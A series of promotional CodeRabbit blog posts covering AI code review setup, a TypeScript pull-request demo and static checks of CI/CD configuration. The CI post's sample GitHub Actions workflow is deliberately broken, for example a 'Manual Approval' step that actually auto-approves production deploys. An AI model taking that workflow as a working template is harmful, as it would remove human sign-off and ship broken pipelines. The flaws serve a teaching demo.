[CodeRabbit](https://docs.coderabbit.ai/) automates repetitive tasks, identifies potential issues, and offers smart suggestions, allowing you to focus on writing maintainable code. With integrations available for popular CI/CD tools and version control systems, CodeRabbit can easily fit into your existing workflows.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/c6540a3b3bd596cf602b1728dd74d59fe83791961aee54d27d880469054dda93_0ecd23dff1.png)

The diagram above illustrates how CodeRabbit streamlines the code review process by addressing anti-patterns so that clean code reaches deployment. The process starts when a developer builds a new feature or fixes a bug and submits a pull request that may contain inefficiencies or anti-patterns. During the code review phase, CodeRabbit detects these patterns and suggests fixes, automating tasks that would otherwise slow down the review process.

Now, let’s set up CodeRabbit and use it to eliminate the anti-patterns discussed above.

**Setting up CodeRabbit**

1. Navigate to the [CodeRabbit Website](https://coderabbit.ai) and get started by signing up for a free account as shown below:

   ![](https://victorious-bubble-f69a016683.media.strapiapp.com/bea5fa0b18f55456ae263d40270ec98f47a767a6361451d23a668e9c8dcc2f9f_c0ca727056.png)

2. After a successful signup, you'll be directed to the dashboard to add the repositories you want CodeRabbit to integrate with. Click the **Add Repositories** button as shown below to add your repositories:

   ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b70e1079ca757c0a877a335c9d05e2049c8fb47cb2521eeda47580e64090a5a6_b0c7be2532.png)

3. Next, you will customize how CodeRabbit integrates and works with your repositories.
Navigate to the **Organization Settings** menu to complete this setup as shown below: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/9d71bbfeea316e98e04e54f6ff1640d14de528311c77be61fe74ce35ec4f2457_3e3742b989.png) To see CodeRabbit in action, create pull requests in any repositories you added. It will begin to provide well-tailored code reviews and suggestions for a better software development experience. CodeRabbit is also useful for plugging existing tools into your code review pipeline, like linting tools, CI/CD tools, etc. **Resolving God Class or Object with CodeRabbit** CodeRabbit will identify complex, overstuffed classes and suggest ways to break them down, as seen in this screenshot. By analyzing class complexity, it recommends splitting God Classes into smaller, more focused components that follow the single responsibility principle. It’ll also alert you to excessive lines of code, methods, and [cyclomatic complexity,](https://en.wikipedia.org/wiki/Cyclomatic_complexity) guiding you toward delegating functionality to more manageable classes. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/00352b3528e4e2686f5c9d6b79d64dcb5e06109979bca3401b05e86714a327d8_f80f7a8ae6.png) **Resolving Spaghetti Code with CodeRabbit** By analyzing logic flow and flagging overly complex sections, CodeRabbit helps you clean up spaghetti code. It offers refactoring suggestions to improve the structure of your code. You’ll get recommendations for breaking down large functions, replacing nested conditionals with polymorphism, and abstracting repetitive logic into reusable components. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/297ee30d335a55d23626bc4a1c0809f6950f776b3423155948a99d3eafff59fa_ad121287a3.png) **Resolving Nit-Picking and Style Feedback** The screenshot shows how CodeRabbit will automatically handle your style and formatting checks, ensuring your code stays consistent. 
This frees you to focus on the important parts like code logic and functionality. Because it flags style issues for you, reviewers can concentrate on performance and architecture.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/7f3e2e5abbed8fea094f7083c683216b7e1e2dc8d46a8a325a27af85917a8344_8247cb2c08.png)

**Resolving Primitive Obsession**

CodeRabbit detects primitive obsession in your codebase and suggests replacing primitive types with domain-specific structures, leading to more expressive and robust code. It identifies overuse of primitives, provides refactoring suggestions, and recommends type safety improvements, like using enums for status codes or custom types for domain concepts such as email addresses or currency values.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/eb3f4726fa583786ca82db5da6c5e990f24e63a691e7f4952757082c5d91c37c_70fd8e1bfd.png)

**Resolving Shotgun Surgery Anti-patterns**

CodeRabbit helps you by suggesting fixes for coupling issues. It analyzes dependencies, suggests refactoring strategies to centralize functionality, recommends design patterns to decouple systems, offers code organization tips, and provides automated refactoring options to implement improvements.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/037091fa4c950f09542062a17e424f14adbce7fcdc8caa9683fd5146d22c313f_d5c2285209.png)

## What’s Next?

Aside from the anti-patterns we've discussed above, other issues can impact your code quality and the efficiency of your review process. These include:

* **Lava Flow:** Old, unused code that builds up over time, increasing technical debt and cluttering your codebase.
* **Cargo Cult Programming:** Applying patterns or tools without understanding why, which leads to unnecessary complexity.
* **Yo-Yo Problem:** Complex inheritance structures that force developers to jump between multiple classes to understand the logic.
* **Magic Numbers:** Hardcoding values directly into the code instead of using named constants, which makes your code harder to read and maintain.

[CodeRabbit](https://coderabbit.ai/) is built to identify and resolve these problems with AI-powered automation and intelligent refactoring suggestions. Streamlining your code reviews and eliminating these mistakes will reduce technical debt, keep your code cleaner, and improve overall maintainability and scalability.

## Conclusion

Anti-patterns in code reviews can slow down your development, create unnecessary hurdles, and compromise the quality of your code. Human review alone often misses them, but AI-assisted code review tools can spot them more consistently and help eliminate them, which makes your software architecture more solid.

With CodeRabbit, you have a solution that helps you overcome these issues. From automating style checks to providing actionable feedback, CodeRabbit reshapes the review process, freeing you up to focus on delivering clean, maintainable code.

[Sign up to CodeRabbit](https://coderabbit.ai/) for a free trial to improve your code reviews by integrating AI into your workflow.

How to Automate TypeScript Code Reviews with CodeRabbit

Ankur Tyagi — Wed, 06 Nov 2024 00:00:00 GMT

In code reviews, discussions often focus on minor issues like formatting and style, while critical aspects such as functionality, performance, and backward compatibility are overlooked. Code reviews can be even more challenging than writing the code itself, as ensuring quality across these critical areas requires careful attention.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/acc0bc879df3fa56f8cca7d09630d6756ff5355c77bd2c3bec93943d06667582_c21d47959c.png)

*Image by Gunnar Morling, licensed under CC BY-SA 4.0.*

> Doing a 'perfect' code review means finding all the bugs, knowing best practices yourself, sorting through a bunch of code you didn't write, writing comments that could be taken as subjective criticism without sounding like a jerk, and justifying every comment you make. It's exhausting from a logical standpoint and a social standpoint. Or you can rubber stamp it but feel bad when a bug makes it through to production and the codebase becomes a mess. 10 lines changed : 10 comments, 500 lines changed : 'LGTM'.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/2613737d37b71863204869f9bf8bcc0a1311c101d12347b9ef576e5a993df950_6e266545a4.jpg)

Many development teams focus on shipping bug-free code to production. While that's important, the ability to quickly spot and resolve issues when they arise, ideally through automated tools or straightforward processes, is frequently overlooked.

But what if I told you there's an easier way, one that completes code reviews in a fraction of the time? That's what CodeRabbit does.

In this guide, we'll learn how to catch issues in a popular OSS TypeScript [codebase](https://github.com/dubinc/dub) using CodeRabbit. Upon completion, you will be able to review TypeScript pull requests in your own codebase and ensure that only high-quality code is merged into your repository using the AI code reviewer CodeRabbit.

> Want to jump right in? Here is the [pull request](https://github.com/tyaga001/dub/pull/1) for a quick look.
## **Prerequisites** [CodeRabbit](https://coderabbit.ai/) is language-agnostic, so you don't need a specific programming language background. However, this article demonstrates how CodeRabbit works using the [Dub.co GitHub repository](https://github.com/dubinc/dub), written in TypeScript. Before you begin, make sure you have the following: * [GitHub Profile](https://github.com/tyaga001) - Ensure you have an active GitHub account to fork and contribute to various code repositories. * Code Editor - A powerful code editor like [Visual Studio Code](https://code.visualstudio.com/) or [IntelliJ IDEA](https://www.jetbrains.com/idea/) ## **Why do you need an AI code reviewer?** As software engineering teams strive to maintain high-quality code while meeting tight deadlines, efficient and reliable code review processes become increasingly necessary. CodeRabbit can 10x your team's productivity and code quality as it can help you with: * **Faster Code Review Cycles** * **Consistent and Objective Feedback** * **Increased Developer Efficiency** * **Continuous Improvement** ## **How to configure CodeRabbit in GitHub** Signing up with CodeRabbit is a two-step process. First, log in using your GitHub account and then add our GitHub app to your organization. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/dba42750f0e1996fe3e91eca2bf18774d0d11f870eeb70455208d7af63bcf000_5228195495.png) Next, we can integrate CodeRabbit into all our code repositories or select specific ones from the list. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/828e6e43e944a8f199adc329b3a2d254a4be06396ac7ba6195fce9ea2abb8e0e_a10fa90a2f.png) Now, CodeRabbit is fully integrated into our repositories and ready to review any code changes. It is as simple as that.
## **Reviewing TypeScript Code using CodeRabbit** > [Dub.co](https://github.com/dubinc/dub) is an open-source link management platform that offers features such as link shortening, analytics, free custom domains, a QR code generator for links, and more. Its codebase is written in TypeScript and React, so a basic understanding of these technologies will help you navigate it more effectively. To get started, let's fork the [Dub.co repository](https://github.com/tyaga001/dub). ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b18fe20b39dcd10bd8d6e103b3c5d126bc8bdac2a222b1903684b97b926c3983_4a242f41c4.png) Next, run the following command in your terminal to clone the [Dub.co](https://github.com/tyaga001/dub) TypeScript repository to your local computer.

```bash
git clone https://github.com/dubinc/dub.git
```

Install its package dependencies using the command below:

```bash
pnpm install
```

Copy the **.env.example** file within the **apps/web** folder into a **.env** file:

```bash
cp .env.example .env
```

Follow the steps in the Dub.co Local Development Guide to set up and run a local version of [dub.co](https://dub.co) on your computer. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0cd5984b6d1a2df976423b5b77bf8784948310c7bdfa080d903d7136cee065e0_79939a90a2.png) ### **Getting a PR review** Let us make a change to the forked [Dub.co](https://github.com/dubinc/dub) repository and see how CodeRabbit identifies issues in a large TypeScript codebase. Before we proceed, create a new GitHub branch called `tutorial/coderabbit` in our forked repo. This will enable us to compare both branches and create pull requests.
![a GitHub repo showing branch selection with 'tutorial/coderabbit' highlighted.](https://victorious-bubble-f69a016683.media.strapiapp.com/8ecaf1963188da83aced62286ad7c780ba37e511f9ef106373b4d1a63263849f_61a3ac4668.png) Navigate into the **app** folder and update the code in the below files: * *app.dub.co/(dashboard)/\[slug\]/page.tsx* * *apps/web/app/api/links/route.ts* * *apps/web/app/*[*app.dub.co/(dashboard)/\[slug\]/auth.tsx*](http://app.dub.co/$dashboard$/%5Bslug%5D/auth.tsx) * *apps/web/app/*[*app.dub.co/(dashboard)/layout.tsx*](http://app.dub.co/$dashboard$/layout.tsx) **For example:** ```typescript export default function WorkspaceLinks() { return (

Testing how CodeRabbit works

CodeRabbit is an AI-powered code reviewer for your code repositories. It provides quick, context-aware code review feedback and line-by-line suggestions, significantly reducing manual review time.

); } ``` The code snippet changes the homepage content. ![CodeRabbit test message showcasing code review features.](https://victorious-bubble-f69a016683.media.strapiapp.com/6f5c7b293113b64b38f1c7354294bf40ccb5fc1d081a7e412b7c489aafb32bef_6bfb2e1fcf.png) To demonstrate how CodeRabbit works, we updated the `page.tsx` file with invalid React syntax and pushed the code to the `tutorial/coderabbit` branch. You can do this via the GitHub web interface or the command line. ```typescript import WorkspaceLinksClient from "./page-client"; export default function WorkspaceLinks() { return ( <>

Testing how CodeRabbit works

CodeRabbit is an AI-powered code reviewer for your code repositories. It provides quick, context-aware code review feedback and line-by-line suggestions, significantly reducing manual review time.

); } ``` Next, we can compare both branches and create a pull request. ![CodeRabbit-PR-Summary](https://victorious-bubble-f69a016683.media.strapiapp.com/a53d82ab2a8a52a7430e9312fb9405a7bfdc8b9fd26e9c96112ef292241b8fcb_7d13950f2c.png) CodeRabbit reviews the updated code on the `tutorial/coderabbit` branch, highlights the issues within the pull request, and even includes sequence diagrams showing how it analyzes the code. Then, it suggests fixes so that the pull request can pass the checks required for merging. **For example,** let's look at CodeRabbit in action. * PR summary by CodeRabbit ![PR summary by CodeRabbit](https://victorious-bubble-f69a016683.media.strapiapp.com/bc32461d64b7455df9e528906fd1d1ea1513b67a2fa9c81e9db228e6b786f766_abe27ebb58.png) * Complete walkthrough by CodeRabbit ![PR walkthrough by CodeRabbit](https://victorious-bubble-f69a016683.media.strapiapp.com/4363f08750cc907c3143d264947923533f9b02812cae979bcdfea045250754e9_d4c6794560.png) * Actionable comments by CodeRabbit ![Actionable comments by CodeRabbit](https://victorious-bubble-f69a016683.media.strapiapp.com/869e232cc0fba59afda168a9789165b3fb815ac7f041dd470c909b6268aaadf4_e61047010e.png) ![Committable suggestion by CodeRabbit](https://victorious-bubble-f69a016683.media.strapiapp.com/4654fcfd10750fa85888f0c8a7bdf840368a142866de29c0559f28d142cbeb2d_9e70b9067b.png) You can check the example pull request here on the [GitHub repository](https://github.com/tyaga001/dub/pull/1). Congratulations. You've successfully integrated CodeRabbit into an open-source TypeScript repository. ## **Conclusion** We looked at how [CodeRabbit](https://coderabbit.ai/) could be integrated into a TypeScript repository. CodeRabbit is an AI Code Reviewer that helps you or your team merge your code changes faster with superior code quality. There is more that you could do with CodeRabbit with TypeScript or JavaScript. 
Here is some further reading: * [Enabling Automated Linting with Biome, Eslint](https://docs.coderabbit.ai/tools/biome) * [Adding Custom Review Instructions](https://docs.coderabbit.ai/guides/review-instructions) * [Discovering Code Intent Patterns](https://docs.coderabbit.ai/guides/commands) [Sign up](https://app.coderabbit.ai/login?free-trial) to CodeRabbit today and merge your PR 10x faster, without compromising code quality or security.

Getting Started with CodeRabbit using Azure DevOps

Aravind Putrevu — Mon, 28 Oct 2024 00:00:00 GMT

We're thrilled to announce that CodeRabbit, our AI-native Code Reviewer, now integrates seamlessly with Azure DevOps. This integration brings the power of [AI-native Code Review](https://coderabbit.ai) to one of the most popular Cloud platforms, helping you catch bugs early, improve code quality, and enhance developer productivity. ### Why Azure DevOps? Azure DevOps is a popular cloud-based platform that provides a comprehensive set of tools for collaborative software development. It offers features like source control, work item tracking, continuous integration and delivery (CI/CD), and more. By integrating CodeRabbit with Azure DevOps, we're making it easier for teams already using Microsoft Azure to leverage AI-native code reviews without disrupting their established Code quality processes. Azure DevOps is trusted by numerous enterprises and development teams worldwide. Its robust features, scalability, and tight integration with the Microsoft ecosystem make it a preferred choice for many organizations. Interestingly, it offers full compatibility with GitHub’s Enterprise Server features. ### How to Use CodeRabbit with Azure DevOps? Using CodeRabbit with Azure DevOps is simple and straightforward. Here's how you can get started: * Log in with your Azure DevOps Account ![](https://victorious-bubble-f69a016683.media.strapiapp.com/03f234289fb7db228a1670b28da85ecf4b79fdd382c712099cf4c123db10554d_9828753fa5.png) * Request permissions from the Org administrator. CodeRabbit is a verified application on Azure DevOps. 
![](https://victorious-bubble-f69a016683.media.strapiapp.com/d8f4e1de78bc04099171f16f5761b35bee5f779abe0e466a04cb9ad669a0f4dc_ae8dd2e8f9.png) * Create a Personal Access Token from the Azure DevOps Console ![](https://victorious-bubble-f69a016683.media.strapiapp.com/3f575a5e5f1e7c71152fa2834693d48e86772567cb3aadef623fda26069ae978_e5a8d7d247.png) * Configure CodeRabbit ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ad0215dc96bf97b71090fba941d50f3cad03722874bcfd80d0b58171d6b7f16e_d6394869a5.png) * Enable the repo for CodeRabbit reviews. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/65f7076131ccf7c87d4901b77697a442316b8eaa0d6d04f4551ff17f57d8a7ee_6b0c7f8c83.png) * Trigger code review to see CodeRabbit post a review within minutes. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/8cd02c041f4ba665c4e339493bd26c825031eba23d9ba6995a10ef6184820c05_458c3f987e.png) Note: If you face issues getting reviews triggered, you might want to check your Project Settings -> Service Hooks. CodeRabbit creates multiple webhooks for each repository. ### Key Benefits of CodeRabbit with Azure DevOps * **Early issue detection**: CodeRabbit performs a thorough, line-by-line review of your code changes within Azure DevOps organization, ensuring that no potential issues slip through the cracks. By identifying and addressing issues at the earliest possible stage, CodeRabbit helps maintain a high-quality codebase and prevents tech debt accumulation. * **Code Consistency and Standards**: CodeRabbit integrates with your linters to automatically enforce coding standards without the need for custom configurations. We learn your organization's unique conventions (stored within your repo on Azure DevOps) and ensure all new code in pull requests adheres to them. With CodeRabbit, developers can focus on innovation while maintainable, consistent code becomes the default. 
* **1-Click Fixes, Chat and more:** We identify and suggest 1-click fixes within the PR of Azure Repo. In addition to providing 1-click fixes, CodeRabbit allows developers to chat, generate unit test code and reason about the 1-click fixes directly within the PR pane in Azure DevOps org interface. Developers can view and apply these suggestions without disrupting their workflow. ### Get started The integration of [CodeRabbit](https://coderabbit.ai/) with [Azure DevOps](https://dev.azure.com) brings the power of AI-native code reviews to teams using this popular development platform. By leveraging CodeRabbit's advanced code review capabilities, developers can identify and fix issues early in the development cycle, improve code quality, and enhance overall productivity. Try it out for yourselves today. Create a [CodeRabbit](https://app.coderabbit.ai/login) account today!

How To Run Static Analysis On Your CI/CD Pipelines Using AI

Atulpriya Sharma — Thu, 17 Oct 2024 00:00:00 GMT

*“An inadvertent misconfiguration during a setup left a data field blank, which then triggered the system to automatically delete the account.” -* was [Google's explanation for accidentally deleting a pension fund's entire account](https://www.business-standard.com/world-news/google-cloud-accidentally-deletes-125-billion-australian-pension-fund-124051800606_1.html). Incidents like these highlight the importance of configuration accuracy in modern software systems. A simple misconfiguration can have devastating consequences, particularly in CI/CD pipelines. Ensuring configuration accuracy and managing the complexity of code reviews can be daunting for DevOps engineers. Teams often prioritize feature development, leaving configuration reviews as an afterthought. This can lead to unnoticed misconfigurations, causing production issues and downtime. CodeRabbit helps solve this by automating code reviews with AI-driven analysis and real-time feedback. Unlike other tools requiring complex setups, CodeRabbit integrates seamlessly into your pipeline, ensuring that static checks on configuration files are accurate and efficient. In this blog post, we will look at CodeRabbit and how it helps with static checking in CI/CD Pipelines, ensuring configuration quality and improving efficiency throughout the end-to-end deployment process. ## Why Static Checking is Crucial in CI/CD Pipelines Configuration files are the backbone of CI/CD pipelines that control the deployment of infrastructure and applications. Errors in these files can lead to costly outages and business disruptions, making early validation essential. Static checking is vital in mitigating security vulnerabilities, code quality issues, and operational disruptions. Below is an example of a Circle CI workflow configuration file that sets up a virtual environment, installs requirement dependencies, and executes linting commands. 
```yaml
jobs:
  lint:
    docker:
      - image: circleci/python:3.9
    steps:
      - checkout
      - run:
          name: Install Dependencies
          command: |
            python -m venv venv
            . venv/bin/activate
            pip install flake8
      - run:
          name: Run Linting
          command: |
            . venv/bin/activate
            flake8 .
```

If static checking didn’t happen in the above configuration, issues like unrecognized syntax or invalid configurations in the Python code could leak, causing the build to fail at later stages. For example, missing dependencies or improperly formatted code could lead to runtime errors that break deployment pipelines or introduce hard-to-trace bugs in production. Overall, static checking helps with: * **Early error detection**: A static check identifies syntax errors and misconfigurations in code before execution, reducing the likelihood of runtime failures. * **Enforce coding standards**: This ensures consistent code quality by enforcing style guidelines and best practices across code and configuration files, making it easier to maintain & review changes. * **Enhancing Code Quality**: Static checks help enforce criteria like passing tests or x% of code coverage, which must be met before any deployment, thus improving the overall quality. ## Using CodeRabbit For Static Checking CodeRabbit gives an edge by integrating with your CI/CD workflows and identifying common misconfigurations. This capability is crucial for maintaining the integrity of the deployment process and preventing disruptions that could affect end-users. In addition, it provides a distinctive benefit in executing static analysis and linting automatically, requiring no additional configuration. For DevOps teams, this functionality streamlines the setup process so they can concentrate on development rather than complicated settings. * It integrates with your CI/CD pipelines without causing any disruption and automatically runs linting and static analysis out of the box, requiring no additional configuration. 
* It supports integration with a wide range of tools across popular CI/CD platforms like GitHub, CircleCI, and GitLab, running checks such as [Actionlint](https://docs.coderabbit.ai/tools/actionlint), [Yamllint](https://docs.coderabbit.ai/tools/yamllint), [ShellCheck](https://docs.coderabbit.ai/tools/shellcheck), [CircleCI](https://docs.coderabbit.ai/tools/circleci) pipelines, etc. This simplifies setup, providing quick results without additional manual effort. * For tools like Jenkins and GitHub Actions, CodeRabbit continuously runs static analysis on every build or commit, catching misconfigurations early and improving workflow reliability. Let us look at CodeRabbit in action in the following section. ## Detecting Misconfiguration with CodeRabbit and GitHub Actions Actionlint To demonstrate the functionality of CodeRabbit, let us look at how we integrate a GitHub Actions workflow into a project to automate the CI/CD pipeline. The repository has a configuration file with potential errors, which will be flagged and reported by CodeRabbit. Below is a diagram of the sequence of tasks in the workflow file we created. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/82c37e735d2d7b717a4e4d99ffc969cfef65ef41cfe29f281b700b320ecd00b7_fec30bdc73.png) By submitting a pull request, we allowed CodeRabbit to review the file and detect potential misconfigurations automatically. Once the repository is prepared, we [integrate it with CodeRabbit to set up automated code reviews](https://coderabbit.ai/blog/how-to-integrate-ai-code-review-into-your-devops-pipeline) and generate a comprehensive, structured report consisting of the following key sections. * **Summary** – A concise overview of the key changes detected in your code or configuration. This helps you quickly understand the main areas that need attention. 
![](https://victorious-bubble-f69a016683.media.strapiapp.com/d56da80a750613b316a45423b880a6c97593d8ddc9068a85c194a42183ac1338_87b42fe802.png) * **Walkthrough** – A detailed, step-by-step analysis of the reviewed files, guiding you through specific issues, configurations, and recommendations. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b09bcf1e8457f0638a3d560d59d5f4716d6e0c17f8c07de9ba3577ffe7a328dc_84c1640739.png) * **Table of Changes** – A table listing all changes in each file and a change summary. This helps you quickly assess and prioritize necessary actions. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/58b6f5ec9883482b80b57da6b4df3ab7b6f69b3017adc2e0774963de2a4c34af_4ab1d7ccbb.png) You can customize these sections by tweaking the configuration file or using the [CodeRabbit dashboard](https://app.coderabbit.ai/). Refer to our [CodeRabbit configuration guide](https://docs.coderabbit.ai/configure-coderabbit) to learn more. Here is a sample `workflow.yaml` config file, for which CodeRabbit's review process provides detailed insights and recommendations. 
```yaml
name: development task

on:
  push:
    branches:
      - main
      - develop
      - staging
  pull_request:
    branches:
      - main
      - develop
      - staging

jobs:
  lint:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v3
      - name: Lint workflow YAML files
        uses: rhysd/actionlint@v1
      - name: Setup Node.js
        uses: actions/setup-node@v3
        with:
          node-version: '18'
      - name: Install dependencies
        run: npm install
      - name: Lint JavaScript code
        run: npm run lint

  build:
    runs-on: ubuntu-latest
    needs: lint
    steps:
      - name: Checkout code
        uses: actions/checkout@v3
      - name: Setup Node.js
        uses: actions/setup-node@v3
        with:
          node-version: '18'
      - name: Install dependencies and cache
        uses: actions/cache@v3
        with:
          path: ~/.npm
          key: ${{ runner.os }}-node-${{ hashFiles('package-lock.json') }}
          restore-keys: |
            ${{ runner.os }}-node-
        run: npm install
      - name: Run tests
        run: npm test
      - name: Check for vulnerabilities
        run: npm audit --production

  terraform:
    runs-on: ubuntu-latest
    needs: build
    steps:
      - name: Checkout code
        uses: actions/checkout@v3
      - name: Setup Terraform
        uses: hashicorp/setup-terraform@v2
        with:
          terraform_version: 1.5.0
      - name: Terraform init
        run: terraform init
        working-directory: infrastructure/
      - name: Terraform plan
        run: terraform plan
        working-directory: infrastructure/
      - name: Terraform apply (development)
        if: github.ref == 'refs/heads/develop'
        run: terraform apply -auto-approve
        working-directory: infrastructure/
        env:
          AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
          AWS_SECRET_ACCES_KEY: ${{ secrets.AWS_SECRET_ACCES_KEY }}

  docker:
    runs-on: ubuntu-latest
    needs: terraform
    steps:
      - name: Checkout code
        uses: actions/checkout@v3
      - name: Login to AWS ECR
        id: login-ecr
        uses: aws-actions/amazon-ecr-login@v1
        with:
          region: us-east-1
      - name: Build and tag Docker image
        run: |
          IMAGE_TAG=${{ github.sha }}
          docker build -t ${{ secrets.ECR_REGISTRY }}/my-app:latest .
          echo "IMAGE_TAG=$IMAGE_TAG" >> $GITHUB_ENV
      - name: Push Docker image to AWS ECR
        run: |
          IMAGE_TAG=${{ env.IMAGE_TAG }}
          docker push ${{ secrets.ECR_REGISTRY }}/my-app:$IMAGE_TAG

  deploy:
    runs-on: ubuntu-latest
    needs: docker
    environment: production
    steps:
      - name: Deploy to Development
        if: github.ref == 'refs/heads/develop'
        run: |
          echo "Deploying to development environment"
          # Your deployment script here
      - name: Deploy to Staging
        if: github.ref == 'refs/heads/staging'
        run: |
          echo "Deploying to staging environment"
          # Your deployment script here
      - name: Manual Approval for Production
        if: github.ref == 'refs/head/main'
        uses: hmarr/auto-approve-action@v2
        with:
          github-token: ${{ secrets.GITHUB_TOKEN }}
      - name: Deploy to Production
        if: github.ref == 'refs/heads/main'
        run: |
          echo "Deploying to production environment"
          # Your deployment script here
```

Before getting into the code review, here’s a high-level overview of what the workflow file accomplishes: * Triggers the CI/CD pipeline on pushes and pull requests to the main, develop, and staging branches, ensuring continuous integration. * Executes a linting workflow that checks the syntax of the YAML configuration and installs the necessary dependencies for the application to ensure code quality. * Sets up Terraform to manage and provision the cloud infrastructure needed for the application. * Executes tests to validate the functionality of the application and checks for vulnerabilities, ensuring the code is secure and stable. * Builds and tags a Docker image for the application, preparing it for deployment. * Pushes the Docker image to AWS Elastic Container Registry (ECR), enabling easy access for deployment. * Deploys the application to different environments (development, staging, and production) based on the branch, including a manual approval step for production deployments to ensure control and oversight. 
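To make the idea of static checking concrete, here is a minimal Python sketch of the kind of structural rules that can catch some of the misconfigurations in a workflow like the one above. It is only an illustration and not how CodeRabbit or `actionlint` work internally: the function name `check_steps`, the list of known environment variable names, and the three rules are all assumptions chosen for this example, and the steps are passed in as already-parsed dictionaries so that no YAML library is needed.

```python
import difflib
import re
from typing import Any

# Illustrative assumptions: these names and rules are hypothetical and are
# not taken from CodeRabbit or actionlint.
KNOWN_ENV_NAMES = ["AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY"]
VALID_REF_KINDS = {"heads", "tags", "pull"}
REF_PATTERN = re.compile(r"refs/(\w+)/")


def check_steps(job_name: str, steps: list[dict[str, Any]]) -> list[str]:
    """Return human-readable findings for one job's already-parsed steps."""
    findings: list[str] = []
    for index, step in enumerate(steps):
        name = step.get("name") or f"step {index}"
        label = f"{job_name}/{name}"

        # Rule 1: a step either uses an action or runs a command, not both.
        if "uses" in step and "run" in step:
            findings.append(f"{label}: step defines both 'uses' and 'run'")

        # Rule 2: git refs in conditions should start with a known prefix.
        for kind in REF_PATTERN.findall(str(step.get("if", ""))):
            if kind not in VALID_REF_KINDS:
                findings.append(
                    f"{label}: condition uses 'refs/{kind}/', "
                    "expected refs/heads/, refs/tags/ or refs/pull/"
                )

        # Rule 3: env names that nearly match a known name are likely typos.
        for key in step.get("env", {}):
            if key in KNOWN_ENV_NAMES:
                continue
            close = difflib.get_close_matches(key, KNOWN_ENV_NAMES, n=1, cutoff=0.9)
            if close:
                findings.append(
                    f"{label}: env name '{key}' looks like a typo of '{close[0]}'"
                )
    return findings


# Three steps copied from the sample workflow, written as plain dictionaries.
SAMPLE_STEPS = [
    {
        "name": "Install dependencies and cache",
        "uses": "actions/cache@v3",
        "run": "npm install",
    },
    {
        "name": "Terraform apply (development)",
        "if": "github.ref == 'refs/heads/develop'",
        "run": "terraform apply -auto-approve",
        "env": {"AWS_ACCESS_KEY_ID": "...", "AWS_SECRET_ACCES_KEY": "..."},
    },
    {
        "name": "Manual Approval for Production",
        "if": "github.ref == 'refs/head/main'",
        "uses": "hmarr/auto-approve-action@v2",
    },
]

for finding in check_steps("sample", SAMPLE_STEPS):
    print(finding)
```

Hand-written rules like these only cover the cases someone thought to encode, which is why a dedicated linter combined with an AI reviewer is the more practical choice for real pipelines.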
Having examined the workflow.yaml configuration file and its various components, we now delve into the individual section, starting with the summary. ### Summary This summary serves as an essential first step in the review process, offering a clear and concise overview of the changes introduced in the latest commit. It provides a quick understanding of the key aspects covered, including new features, styling adjustments, configuration changes, and other relevant modifications raised in the pull request. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e84d1c1ef723f333fbdb9d5de330847aacff41614bff36565b3353b164313429_daa6eefe9d.png) The above snippet highlights important maintenance tasks, including running the application in non-debug mode for improved performance and implementing an automated CI/CD pipeline to streamline code linting, building, and deployment processes. This summary helps in understanding the key changes and enhancements made in the latest commit. After reviewing the key changes in the Summary, we can explore the Walkthrough section of the report, which provides a detailed breakdown of specific modifications. ### Walkthrough This section provides a comprehensive overview of the specific modifications made across different files in the latest commit. Each file is assessed for its unique contributions to the project, ensuring clarity on how these changes enhance the overall functionality and user experience. The Changes Table serves as a concise summary of specific modifications made across various files in the latest commit, allowing developers to quickly identify where changes have occurred within the codebase. Each row indicates an altered file, accompanied by a detailed description of the modifications in the Change Summary column. This includes updates related to styling in CSS files, application logic functionality adjustments, and CI/CD pipeline configuration enhancements. 
![](https://victorious-bubble-f69a016683.media.strapiapp.com/acc1bb84d9eb8103152175f9c618171f80f86aa9b1fd48bc145e01c72e8c2466_4a21655ee8.png) By presenting this information in a structured format, the table offers clarity and organization, making it easier for developers to digest and understand the impact of each change on the project. Overall, it acts as an essential reference for collaboration, enabling team members to focus on pertinent areas that may require further discussion or review while tracking the evolution of the codebase. To add a fun element, it also generates a poem for your errors. ### Code Review The following section thoroughly examines the configuration file, identifying areas for enhancement. From improving caching strategies to optimizing deployment processes, these recommendations are tailored to your code to enhance your GitHub Actions workflow's overall efficiency and robustness. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/8205895249332b1f89e9a6f1a6952ed91b6c85ecbb755c376df221691cce3c98_cedf009c98.png) It provides an overview of the **actionable comments** along with the review details: the configuration used, the review profile, the files selected for processing, and the additional context used. These can also include one-click commit suggestions. Let us look at the review comments that CodeRabbit suggested for the different sections of the workflow file. It automatically detects that the configuration file is a GitHub Actions workflow and uses `actionlint` to analyze it thoroughly. During the review, CodeRabbit provides valuable insights and suggestions for optimizing performance. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b90fed0079413daafc7df51764bd44eef4c30b982434c57b2b1baccbf76917a2_72e8a0f8f3.png) In our lint job it identified an opportunity to cache npm dependencies using `actions/cache@v3`. 
